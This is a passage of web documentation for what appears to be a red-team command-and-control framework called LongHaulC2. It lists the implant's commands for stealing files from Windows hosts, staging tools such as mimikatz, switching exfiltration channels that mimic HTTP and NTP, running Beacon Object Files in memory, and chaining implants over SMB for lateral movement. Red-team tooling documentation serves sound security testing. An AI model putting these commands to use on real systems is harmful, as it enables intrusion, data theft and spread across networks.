<li class=""><strong>Usage:</strong> <code>cd &lt;directory&gt;</code></li>
<li class=""><strong>Example:</strong> <code>cd C:\\Users\\</code></li>
</ul>
<p><strong>Return Values</strong></p>
<table><thead><tr><th>Field</th><th>Value</th></tr></thead><tbody><tr><td><code>data</code></td><td><code>&quot;&quot;</code> (empty — no output on success)</td></tr><tr><td><code>message</code></td><td>Windows error message</td></tr><tr><td><code>windows_error_code</code></td><td>Resulting Windows error code</td></tr></tbody></table>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="ls"><code>ls</code><a href="#ls" class="hash-link" aria-label="Direct link to ls" title="Direct link to ls" translate="no">​</a></h3>
<p>Lists the contents of a directory. Defaults to the current working directory if no path is provided.</p>
<ul>
<li class=""><strong>Usage:</strong> <code>ls [directory]</code></li>
<li class=""><strong>Example:</strong> <code>ls C:\\Users\\</code></li>
</ul>
<p><strong>Return Values</strong></p>
<table><thead><tr><th>Field</th><th>Value</th></tr></thead><tbody><tr><td><code>data</code></td><td>Newline-separated list of entries. Split on <code>\n</code> for programmatic use.</td></tr><tr><td><code>message</code></td><td>Windows error message</td></tr><tr><td><code>windows_error_code</code></td><td>Resulting Windows error code</td></tr></tbody></table>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="file-download"><code>file download</code><a href="#file-download" class="hash-link" aria-label="Direct link to file-download" title="Direct link to file-download" translate="no">​</a></h3>
<p>Retrieves a file from the host.</p>
<blockquote>
<p><strong>Auto-capture:</strong> Successful file downloads are automatically saved to the server filestore by the response pipeline. The saved file can then be referenced with <code>fs:&lt;filename&gt;</code> in other commands, or downloaded from the Filestore page. The filestore entry includes provenance metadata (<code>uploaded_by</code>, <code>source_implant</code>).</p>
</blockquote>
<ul>
<li class=""><strong>Usage:</strong> <code>file download &lt;file_path&gt;</code></li>
<li class=""><strong>Example:</strong> <code>file download C:\\Users\\user\\secrets.txt</code></li>
</ul>
<p><strong>Return Values</strong></p>
<table><thead><tr><th>Field</th><th>Value</th></tr></thead><tbody><tr><td><code>data</code></td><td>Raw file bytes. Displayed as base64 in the UI.</td></tr><tr><td><code>message</code></td><td>Windows error message</td></tr><tr><td><code>windows_error_code</code></td><td>Resulting Windows error code</td></tr></tbody></table>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="file-upload"><code>file upload</code><a href="#file-upload" class="hash-link" aria-label="Direct link to file-upload" title="Direct link to file-upload" translate="no">​</a></h3>
<p>Writes a file to the host from base64-encoded content, from the memory store (<code>*</code>), or from the server filestore (<code>fs:</code>).</p>
<blockquote>
<p>When using the GUI, paste a Base64 string — the interface decodes it before serializing to MessagePack. When calling the API directly, you can pass raw binary in the MessagePack task.</p>
</blockquote>
<ul>
<li class=""><strong>Usage:</strong> <code>file upload &lt;file_path&gt; &lt;base64_content&gt;</code></li>
<li class=""><strong>Deref usage:</strong> <code>file upload &lt;file_path&gt; *&lt;memstore_name&gt;</code></li>
<li class=""><strong>Filestore usage:</strong> <code>file upload &lt;file_path&gt; fs:&lt;filestore_filename&gt;</code></li>
<li class=""><strong>Example:</strong> <code>file upload C:\\Temp\\tool.exe &lt;base64_file_contents&gt;</code></li>
<li class=""><strong>Example (filestore):</strong> <code>file upload C:\\Temp\\mimikatz.exe fs:mimikatz.exe</code></li>
</ul>
<p><strong>Return Values</strong></p>
<table><thead><tr><th>Field</th><th>Value</th></tr></thead><tbody><tr><td><code>data</code></td><td><code>&quot;&quot;</code> (empty)</td></tr><tr><td><code>message</code></td><td>Windows error message</td></tr><tr><td><code>windows_error_code</code></td><td>Resulting Windows error code</td></tr></tbody></table>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="3-c2-strategy">3. C2 Strategy<a href="#3-c2-strategy" class="hash-link" aria-label="Direct link to 3. C2 Strategy" title="Direct link to 3. C2 Strategy" translate="no">​</a></h2>
<p>Manage how the implant communicates with the C2 server. Each implant has a GET strategy (how it retrieves tasks) and a POST strategy (how it exfiltrates data/results). Strategies are named using the <strong>callback host</strong> (set at build time), the listener port, and the profile name. See <a class="" href="/01 Listeners/Overview#callback-host">Listeners &gt; Callback Host</a> for details on how strategy names are derived.</p>
<table><thead><tr><th>Command</th><th>Description</th></tr></thead><tbody><tr><td><code>strat active</code></td><td>Show the currently active GET and POST strategy names.</td></tr><tr><td><code>strat list</code></td><td>List all strategies available in the implant.</td></tr><tr><td><code>strat set post</code></td><td>Set the POST (exfil) strategy.</td></tr><tr><td><code>strat set get</code></td><td>Set the GET (tasking) strategy.</td></tr><tr><td><code>strat set both</code></td><td>Set both GET and POST strategies in one command.</td></tr></tbody></table>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="strat-active"><code>strat active</code><a href="#strat-active" class="hash-link" aria-label="Direct link to strat-active" title="Direct link to strat-active" translate="no">​</a></h3>
<p>Displays the names of the currently active GET and POST strategies.</p>
<ul>
<li class=""><strong>Usage:</strong> <code>strat active</code></li>
</ul>
<p><strong>Example output:</strong></p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#F8F8F2;--prism-background-color:#282A36"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#F8F8F2;background-color:#282A36"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#F8F8F2"><span class="token plain">--- comms_get_strategy ---</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">raw_60_1_1_1_80_HTTP_Mimicry</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">--- comms_post_strategy ---</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">raw_60_1_1_1_80_HTTP_Mimicry</span><br></div></code></pre></div></div>
<p><strong>Custom Return Fields</strong> (in addition to standard <code>data</code>, <code>message</code>, <code>windows_error_code</code>):</p>
<table><thead><tr><th>Field</th><th>Value</th></tr></thead><tbody><tr><td><code>comms_get_strategy</code></td><td>Name of the active GET (tasking) strategy</td></tr><tr><td><code>comms_post_strategy</code></td><td>Name of the active POST (exfil) strategy</td></tr></tbody></table>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="strat-list"><code>strat list</code><a href="#strat-list" class="hash-link" aria-label="Direct link to strat-list" title="Direct link to strat-list" translate="no">​</a></h3>
<p>Lists all strategies compiled into the implant.</p>
<ul>
<li class=""><strong>Usage:</strong> <code>strat list</code></li>
</ul>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="strat-set-post"><code>strat set post</code><a href="#strat-set-post" class="hash-link" aria-label="Direct link to strat-set-post" title="Direct link to strat-set-post" translate="no">​</a></h3>
<p>Sets the POST (exfiltration) strategy.</p>
<ul>
<li class=""><strong>Usage:</strong> <code>strat set post &lt;strategy_name&gt;</code></li>
<li class=""><strong>Example:</strong> <code>strat set post raw_60_1_1_1_80_HTTP_Mimicry</code></li>
</ul>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="strat-set-get"><code>strat set get</code><a href="#strat-set-get" class="hash-link" aria-label="Direct link to strat-set-get" title="Direct link to strat-set-get" translate="no">​</a></h3>
<p>Sets the GET (task retrieval) strategy.</p>
<ul>
<li class=""><strong>Usage:</strong> <code>strat set get &lt;strategy_name&gt;</code></li>
<li class=""><strong>Example:</strong> <code>strat set get raw_60_1_1_1_80_HTTP_Mimicry</code></li>
</ul>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="strat-set-both"><code>strat set both</code><a href="#strat-set-both" class="hash-link" aria-label="Direct link to strat-set-both" title="Direct link to strat-set-both" translate="no">​</a></h3>
<p>Sets GET and POST in a single command. Pass one name to apply it to both channels, or two names to set them independently.</p>
<ul>
<li class=""><strong>Usage (same profile for both):</strong> <code>strat set both &lt;strategy_name&gt;</code></li>
<li class=""><strong>Usage (split profiles):</strong> <code>strat set both &lt;get_strategy_name&gt; &lt;post_strategy_name&gt;</code></li>
</ul>
<p><strong>Examples:</strong></p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#F8F8F2;--prism-background-color:#282A36"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#F8F8F2;background-color:#282A36"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#F8F8F2"><span class="token plain">strat set both raw_60_1_1_1_80_HTTP_Mimicry</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain" style="display:inline-block"></span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">strat set both raw_60_1_1_1_80_HTTP_Mimicry raw_60_1_1_1_123_NTP_Mimicry</span><br></div></code></pre></div></div>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="4-memory-store">4. Memory Store<a href="#4-memory-store" class="hash-link" aria-label="Direct link to 4. Memory Store" title="Direct link to 4. Memory Store" translate="no">​</a></h2>
<p>Interact with the implant&#x27;s volatile in-memory storage. See <a class="" href="/02 Implants/Systems/MemStore">MemStore docs</a> for full implementation detail.</p>
<table><thead><tr><th>Command</th><th>Description</th></tr></thead><tbody><tr><td><code>memstore list</code></td><td>List all filenames in the memory store.</td></tr><tr><td><code>memstore upload</code></td><td>Upload a file into the memory store.</td></tr><tr><td><code>memstore download</code></td><td>Download a file from the memory store.</td></tr><tr><td><code>memstore delete</code></td><td>Delete a specific file from the memory store.</td></tr><tr><td><code>memstore clear</code></td><td>Wipe all files from the memory store.</td></tr></tbody></table>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="memstore-list"><code>memstore list</code><a href="#memstore-list" class="hash-link" aria-label="Direct link to memstore-list" title="Direct link to memstore-list" translate="no">​</a></h3>
<p>Lists the names of all entries in the memory store.</p>
<ul>
<li class=""><strong>Usage:</strong> <code>memstore list</code></li>
</ul>
<p><strong>Return Values</strong></p>
<table><thead><tr><th>Field</th><th>Value</th></tr></thead><tbody><tr><td><code>data</code></td><td>Newline-separated list of file names</td></tr><tr><td><code>message</code></td><td>Windows error message</td></tr><tr><td><code>windows_error_code</code></td><td>Resulting Windows error code</td></tr></tbody></table>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="memstore-upload"><code>memstore upload</code><a href="#memstore-upload" class="hash-link" aria-label="Direct link to memstore-upload" title="Direct link to memstore-upload" translate="no">​</a></h3>
<p>Uploads a file into the implant&#x27;s in-memory store. The file never touches disk.</p>
<blockquote>
<p>When using the GUI, pass a Base64 string. The interface decodes it before sending.</p>
</blockquote>
<ul>
<li class=""><strong>Usage:</strong> <code>memstore upload &lt;file_name&gt; &lt;base64_content&gt;</code></li>
<li class=""><strong>Filestore usage:</strong> <code>memstore upload &lt;file_name&gt; fs:&lt;filestore_filename&gt;</code></li>
<li class=""><strong>Example:</strong> <code>memstore upload my_tool.exe aabbcc==</code></li>
<li class=""><strong>Example (filestore):</strong> <code>memstore upload my_tool.exe fs:my_tool.exe</code></li>
</ul>
<p><strong>Return Values</strong></p>
<table><thead><tr><th>Field</th><th>Value</th></tr></thead><tbody><tr><td><code>data</code></td><td><code>&quot;&quot;</code> (empty)</td></tr><tr><td><code>message</code></td><td>Windows error message</td></tr><tr><td><code>windows_error_code</code></td><td>Resulting Windows error code</td></tr></tbody></table>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="memstore-download"><code>memstore download</code><a href="#memstore-download" class="hash-link" aria-label="Direct link to memstore-download" title="Direct link to memstore-download" translate="no">​</a></h3>
<p>Retrieves a file from the memory store. Returned as raw bytes (displayed as base64 in the UI).</p>
<ul>
<li class=""><strong>Usage:</strong> <code>memstore download &lt;file_name&gt;</code></li>
<li class=""><strong>Example:</strong> <code>memstore download my_tool.exe</code></li>
</ul>
<p><strong>Return Values</strong></p>
<table><thead><tr><th>Field</th><th>Value</th></tr></thead><tbody><tr><td><code>data</code></td><td>File bytes (base64 in GUI)</td></tr><tr><td><code>message</code></td><td>Windows error message</td></tr><tr><td><code>windows_error_code</code></td><td>Resulting Windows error code</td></tr></tbody></table>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="memstore-delete"><code>memstore delete</code><a href="#memstore-delete" class="hash-link" aria-label="Direct link to memstore-delete" title="Direct link to memstore-delete" translate="no">​</a></h3>
<p>Removes a specific file from the memory store.</p>
<ul>
<li class=""><strong>Usage:</strong> <code>memstore delete &lt;file_name&gt;</code></li>
<li class=""><strong>Example:</strong> <code>memstore delete my_tool.exe</code></li>
</ul>
<p><strong>Return Values</strong></p>
<table><thead><tr><th>Field</th><th>Value</th></tr></thead><tbody><tr><td><code>data</code></td><td><code>&quot;&quot;</code> (empty)</td></tr><tr><td><code>message</code></td><td>Windows error message</td></tr><tr><td><code>windows_error_code</code></td><td>Resulting Windows error code</td></tr></tbody></table>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="memstore-clear"><code>memstore clear</code><a href="#memstore-clear" class="hash-link" aria-label="Direct link to memstore-clear" title="Direct link to memstore-clear" translate="no">​</a></h3>
<p>Wipes everything from the memory store.</p>
<ul>
<li class=""><strong>Usage:</strong> <code>memstore clear</code></li>
</ul>
<p><strong>Return Values</strong></p>
<table><thead><tr><th>Field</th><th>Value</th></tr></thead><tbody><tr><td><code>data</code></td><td><code>&quot;&quot;</code> (empty)</td></tr><tr><td><code>message</code></td><td>Windows error message</td></tr><tr><td><code>windows_error_code</code></td><td>Resulting Windows error code</td></tr></tbody></table>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="5-execution">5. Execution<a href="#5-execution" class="hash-link" aria-label="Direct link to 5. Execution" title="Direct link to 5. Execution" translate="no">​</a></h2>
<table><thead><tr><th>Command</th><th>Description</th></tr></thead><tbody><tr><td><code>bof</code></td><td>Load and execute a Beacon Object File (BOF) in-process.</td></tr></tbody></table>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="bof"><code>bof</code><a href="#bof" class="hash-link" aria-label="Direct link to bof" title="Direct link to bof" translate="no">​</a></h3>
<p>Executes a compiled Beacon Object File (BOF) within the implant&#x27;s process space. The BOF bytes can be supplied as a base64 string, loaded from the implant&#x27;s memory store (<code>*</code>), or fetched from the server filestore (<code>fs:</code>).</p>
<blockquote>
<p>When calling via the API or GUI, supply the BOF bytes as base64, place the tool in the memory store first (<code>memstore upload</code>) and reference it with <code>*name</code>, or reference a file in the server filestore with <code>fs:name</code>.</p>
</blockquote>
<ul>
<li class=""><strong>Usage:</strong> <code>bof &lt;base64_bof_bytes&gt; [args...]</code></li>
<li class=""><strong>Deref usage:</strong> <code>bof *&lt;memstore_name&gt; [args...]</code></li>
<li class=""><strong>Filestore usage:</strong> <code>bof fs:&lt;filestore_filename&gt; [args...]</code></li>
</ul>
<p><strong>Examples:</strong></p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#F8F8F2;--prism-background-color:#282A36"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#F8F8F2;background-color:#282A36"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#F8F8F2"><span class="token plain">bof &lt;base64_encoded_bof&gt; -domain contoso.local</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain" style="display:inline-block"></span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">bof *enumerate_domain -domain contoso.local</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain" style="display:inline-block"></span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">bof fs:enumerate_domain.o -domain contoso.local</span><br></div></code></pre></div></div>
<p><strong>Return Values</strong></p>
<table><thead><tr><th>Field</th><th>Value</th></tr></thead><tbody><tr><td><code>data</code></td><td>Captured stdout from the BOF. Empty if execution failed or no output.</td></tr><tr><td><code>message</code></td><td>Windows error message</td></tr><tr><td><code>windows_error_code</code></td><td>See codes below</td></tr></tbody></table>
<p><strong>Error Codes:</strong></p>
<table><thead><tr><th>Code</th><th>Meaning</th></tr></thead><tbody><tr><td><code>0</code> (<code>ERROR_SUCCESS</code>)</td><td>BOF executed successfully</td></tr><tr><td><code>ERROR_INTERNAL_ERROR</code></td><td>BOF launcher failed to initialize, or BOF failed to execute</td></tr><tr><td><code>ERROR_BAD_FORMAT</code></td><td>BOF bytes could not be parsed or loaded from memory</td></tr><tr><td><code>ERROR_OUTOFMEMORY</code></td><td>Argument structure failed to initialize</td></tr><tr><td><code>ERROR_UNIDENTIFIED_ERROR</code></td><td>BOF finished but no output could be retrieved from the context</td></tr></tbody></table>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="6-smb-chaining--lateral-movement">6. SMB Chaining / Lateral Movement<a href="#6-smb-chaining--lateral-movement" class="hash-link" aria-label="Direct link to 6. SMB Chaining / Lateral Movement" title="Direct link to 6. SMB Chaining / Lateral Movement" translate="no">​</a></h2>
<p>Link implants together over SMB named pipes to route tasking and results through a chain without each node requiring direct internet access.</p>
<table><thead><tr><th>Command</th><th>Description</th></tr></thead><tbody><tr><td><code>link smb</code></td><td>Connect to a child implant via SMB named pipes.</td></tr><tr><td><code>link list</code></td><td>List all currently linked child implants.</td></tr><tr><td><code>unlink smb</code></td><td>Sever the SMB link to a specific child.</td></tr></tbody></table>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="link-smb"><code>link smb</code><a href="#link-smb" class="hash-link" aria-label="Direct link to link-smb" title="Direct link to link-smb" translate="no">​</a></h3>
<p>Establishes an SMB named-pipe connection from this implant to a downstream child. The child must already be running and listening on the specified pipes.</p>
<blockquote>
<p><code>\\.\</code> is automatically prepended to the pipe names — supply just the bare pipe name (e.g. <code>inbox2</code>, not <code>\\.\inbox2</code>).</p>
</blockquote>
<ul>
<li class=""><strong>Usage:</strong> <code>link smb &lt;target_host&gt; &lt;inbox_pipe&gt; &lt;outbox_pipe&gt;</code></li>
<li class=""><strong>Example:</strong> <code>link smb 192.168.1.50 inbox2 outbox2</code></li>
</ul>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="link-list"><code>link list</code><a href="#link-list" class="hash-link" aria-label="Direct link to link-list" title="Direct link to link-list" translate="no">​</a></h3>
<p>Lists all child implants currently linked to this implant.</p>
<ul>
<li class=""><strong>Usage:</strong> <code>link list</code></li>
</ul>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="unlink-smb"><code>unlink smb</code><a href="#unlink-smb" class="hash-link" aria-label="Direct link to unlink-smb" title="Direct link to unlink-smb" translate="no">​</a></h3>
<p>Severs the SMB link to a specific child implant by its UUID.</p>
<ul>
<li class=""><strong>Usage:</strong> <code>unlink smb &lt;child_uuid&gt;</code></li>
<li class=""><strong>Example:</strong> <code>unlink smb 01932ba4-1234-7f00-a12b-000000000000</code></li>
</ul></div></article><nav class="docusaurus-mt-lg pagination-nav" aria-label="Docs pages"><a class="pagination-nav__link pagination-nav__link--prev" href="/06 Network Profiles/Raw Profiles"><div class="pagination-nav__sublabel">Previous</div><div class="pagination-nav__label">Profile Technical Reference</div></a><a class="pagination-nav__link pagination-nav__link--next" href="/02 Implants/Modules/Overview &amp; Modifications"><div class="pagination-nav__sublabel">Next</div><div class="pagination-nav__label">Modules</div></a></nav></div></div><div class="col col--3"><div class="tableOfContents_bqdL thin-scrollbar theme-doc-toc-desktop"><ul class="table-of-contents table-of-contents__left-border"><li><a href="#command-tree" class="table-of-contents__link toc-highlight">Command Tree</a></li><li><a href="#a-note-on-command-outputs" class="table-of-contents__link toc-highlight">A Note on Command Outputs</a></li><li><a href="#0-special-prefixes" class="table-of-contents__link toc-highlight">0. Special Prefixes</a><ul><li><a href="#the-dereference-operator-" class="table-of-contents__link toc-highlight">The Dereference Operator (<code>*</code>)</a></li><li><a href="#the-filestore-prefix-fs" class="table-of-contents__link toc-highlight">The Filestore Prefix (<code>fs:</code>)</a></li><li><a href="#fs-vs---when-to-use-which" class="table-of-contents__link toc-highlight"><code>fs:</code> vs <code>*</code> — when to use which</a></li></ul></li><li><a href="#1-system-commands" class="table-of-contents__link toc-highlight">1. System Commands</a><ul><li><a href="#exit" class="table-of-contents__link toc-highlight"><code>exit</code></a></li><li><a href="#sleep" class="table-of-contents__link toc-highlight"><code>sleep</code></a></li></ul></li><li><a href="#2-file-system-operations" class="table-of-contents__link toc-highlight">2. File System Operations</a><ul><li><a href="#cd" class="table-of-contents__link toc-highlight"><code>cd</code></a></li><li><a href="#ls" class="table-of-contents__link toc-highlight"><code>ls</code></a></li><li><a href="#file-download" class="table-of-contents__link toc-highlight"><code>file download</code></a></li><li><a href="#file-upload" class="table-of-contents__link toc-highlight"><code>file upload</code></a></li></ul></li><li><a href="#3-c2-strategy" class="table-of-contents__link toc-highlight">3. C2 Strategy</a><ul><li><a href="#strat-active" class="table-of-contents__link toc-highlight"><code>strat active</code></a></li><li><a href="#strat-list" class="table-of-contents__link toc-highlight"><code>strat list</code></a></li><li><a href="#strat-set-post" class="table-of-contents__link toc-highlight"><code>strat set post</code></a></li><li><a href="#strat-set-get" class="table-of-contents__link toc-highlight"><code>strat set get</code></a></li><li><a href="#strat-set-both" class="table-of-contents__link toc-highlight"><code>strat set both</code></a></li></ul></li><li><a href="#4-memory-store" class="table-of-contents__link toc-highlight">4. Memory Store</a><ul><li><a href="#memstore-list" class="table-of-contents__link toc-highlight"><code>memstore list</code></a></li><li><a href="#memstore-upload" class="table-of-contents__link toc-highlight"><code>memstore upload</code></a></li><li><a href="#memstore-download" class="table-of-contents__link toc-highlight"><code>memstore download</code></a></li><li><a href="#memstore-delete" class="table-of-contents__link toc-highlight"><code>memstore delete</code></a></li><li><a href="#memstore-clear" class="table-of-contents__link toc-highlight"><code>memstore clear</code></a></li></ul></li><li><a href="#5-execution" class="table-of-contents__link toc-highlight">5. Execution</a><ul><li><a href="#bof" class="table-of-contents__link toc-highlight"><code>bof</code></a></li></ul></li><li><a href="#6-smb-chaining--lateral-movement" class="table-of-contents__link toc-highlight">6. SMB Chaining / Lateral Movement</a><ul><li><a href="#link-smb" class="table-of-contents__link toc-highlight"><code>link smb</code></a></li><li><a href="#link-list" class="table-of-contents__link toc-highlight"><code>link list</code></a></li><li><a href="#unlink-smb" class="table-of-contents__link toc-highlight"><code>unlink smb</code></a></li></ul></li></ul></div></div></div></div></main></div></div></div><footer class="theme-layout-footer footer footer--dark"><div class="container container-fluid"><div class="footer__bottom text--center"><div class="footer__copyright">LongHaulC2 — Built with Docusaurus.</div></div></div></footer></div>
</body>
</html>